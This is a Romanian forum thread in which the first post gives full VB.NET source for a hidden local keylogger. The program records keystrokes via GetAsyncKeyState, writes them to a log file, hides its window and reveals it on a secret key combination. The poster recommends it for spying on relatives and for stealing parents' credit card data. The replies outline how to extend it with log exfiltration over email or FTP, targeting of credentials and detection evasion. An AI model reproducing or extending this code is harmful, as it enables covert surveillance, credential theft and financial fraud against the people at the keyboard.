Jump to content
raynor009

[GHID][VB.NET]Cum sa facem un keylogger local

Recommended Posts

Nu prea am ce sa va explic, codul este destul de simplu, chiar si cineva fara experienta l-ar intelege. Am sa adaug comentari in codul sursa ca sa intelegi ce si cum. Ce avem nevoie:

1 buton - schimbam numele in "btnHide"

1 textbox - schimbam numele in "tbLog"

2 timere => schimbam numele la Timer1 in "timerKeys" si selectam "Enabled" iar intervalul 2. Pentru Timer2 ii dam numele "timerSave" si selectam "Enabled" iar intervalul va fi 10000 (10 secunde).

Option Strict On

Public Class Form1
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Integer) As Integer

Private Sub timerKeys_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles timerKeys.Tick
Dim result As Integer
Dim key As String
Dim i As Integer
For i = 2 To 90
result = 0
result = GetAsynckeyState(i)
If result = -32767 Then
key = Chr(i)
If i = 13 Then key = vbNewLine [COLOR="#FF0000"]// Atunci cand apasa space sau pointeru trece la o noua linee lafel face si programul[/COLOR]
Exit For

End If
Next i

If key <> Nothing Then
If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then [COLOR="#FF0000"]// Atunci cand este apasat capslock sau shift ca sa scrie cu litere mari programul va sti sa copieze la fel[/COLOR]
tbLog.Text &= key
Else
tbLog.Text &= key.ToLower
End If
End If

If My.Computer.Keyboard.CtrlKeyDown AndAlso My.Computer.Keyboard.AltKeyDown AndAlso key = "a" Then
Me.Show() [COLOR="#FF0000"]// Cand apesi Ctrl+Alt+A programul o sa apara[/COLOR]
End If

End Sub

Private Sub btnHide_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnHide.Click
Me.Hide()
End Sub

Private Sub timerSave_Tick() Handles timerSave.Tick
My.Computer.FileSystem.WriteAllText("C:\Log\Log.txt", tbLog.Text, True) [COLOR="#FF0000"]// Salveaza fisierul in locatia pe care o doriti[/COLOR]
tbLog.Clear()
End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
tbLog.Text = "Inregistreaza de la ora: " & Now & vbNewLine
End Sub
End Class

Bafta la programare. In urmatorul tutorial am sa va arat cum sa facem sa primim logurile prin FTP sau Email si cum sa se adauge la Startup. Deocamdata este bun daca vreti sa spionatii copii,fratii,nepotii care folosesc acelasi calculator sau simplu vreti sa imprumutati datele cartilor de credit a parintilor(la mine o mers).

SURSA:

Edited by raynor009
Link to comment
Share on other sites

Bafta la programare si tie...amice problema e alta...Pui coduri luate dupa youtube...e nimic...insa le pui de oriunde si asta e problema...sper ca ai inteles:))

Mesajul meu este, mai multa metodologie frate...nu pui 1 buton dai rename pula mea...intelegi?

Incepe asa...o mica povestioara(introducere)...dupa care pasii..sa zicem..."Si acum va trebui sa stocam logurile undeva...avem mai multe optiuni...le trimitem pe mail...sau ftp, web ,va voi explica fiecare metoda dar mai intai vom incepe cu mail...." etc ceva de genul

Nu pune cod si atat...ca nu e suficient...cand faci un tutorial fa in asa fel sa ii inveti fara sa le arati si tot codul...asa incat sa invete dupa propriul cod...E mai mult decat banal si imoral...ca sa nu zic cretin lucrul pe care l-ai facut tu, desigur sunt oameni aici pe forum care sunt dispusi sa "invete" sau sa practice ca papagalul fiecare chestie pe care o postezi tu din diferite surse.

Nu o lua in nume de rau, dar e mai corect sa explici orice dupa care dai un mic exemplu pentru fiecare lucru in parte...Ce s-ar intampla daca si msdn ar pune cod sau un intreg proiect pe tava fara sa explice nimic....ce ati mai fi invatat voi acum?

Ca sa va fac o introducere...la subiect...Ca sa faceti un keylogger...va trebuie o metoda sa capturati input de la tastatura...sa salvati acele date...se mai numesc log-uri...va trebui sa implementati o metoda de a avea acces la acele loguri...calea cea mai simpla este prin e-mail si ftp...insa puteti face orice va imaginati....spre exemplu o pagina php....le puteti trimite acolo..ar mai fi o metoda...sa le trimiteti intr-o baza de date...mysql...sau chiar si access sau sql.

De asemenea captarea logurilor ar fi o chestie mai grea....sunt nspe mii de metode pentru a face asta...de asemenea ar mai fi greu de implementat ce sa capteze...poate vreti doar users:pass de la un anumit browser sau website...nu toti isi doresc sa le apara....wdasdwasdaw din CS.

Cu toate astea trebuie gandita treaba...ce anume vreti sa faceti...apoi impartiti voi fiecare functie in parte...cum am precizat mai sus...Capture>Parsing>Sending Method...>How and where to send.....cam asta este sau vad eu problema in legatura cu un keylogger...Problema cea mai importanta este si detectarea, care nu se aplica doar la keyloggere..si cam asta ar fi:)

Link to comment
Share on other sites

Nu imi amintesc sa fi spus ca codul de mai sus imi apartine .A, ca nu am postat sursa este alta treaba. Iar daca vrei sa faci aici pe expertul te rog frumos sa vi tu cu un tutorial original nu cu "coduri luate dupa youtube" .Da acest cod a fost luat depe YouTube. Dece ? Am crezut ca ar fi un exemplu bun.

Link to comment
Share on other sites

Credema m-ai inteles gresit, se intampla asta de nenumarate ori...uitete putin peste posturile mele sa vezi cam la ce capitol sunt...2 eu zic sa citesti cu atentie ce am scris mai sus.

Mie nu mi se pare ca in rubrica programare...sa punem coduri dupa youtube si atat...Inca o data...nu conteaza de unde sunt ele...conteaza sa le explici...functiile in parte, ia-o ca pe o reteta...nu pui aia aia aia toate ingramadite si hop savarina...intelegi? ca poate iese nasol pentru unii iar din cate am observat pe posturile tale tu incerci sa faci pe expertul insa pui ceea ce majoritatea numesc junk code...

Inca o data nu te supara...nu a fost cu intentia sa te jignesc...dar daca crezi ca ai idee despre ce postezi tu...explica putin...ca nu te doare mana si ai sa vezi si rezultate...si anume persoane cu peste 6 posturi gasind folositor tutorialul tau.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...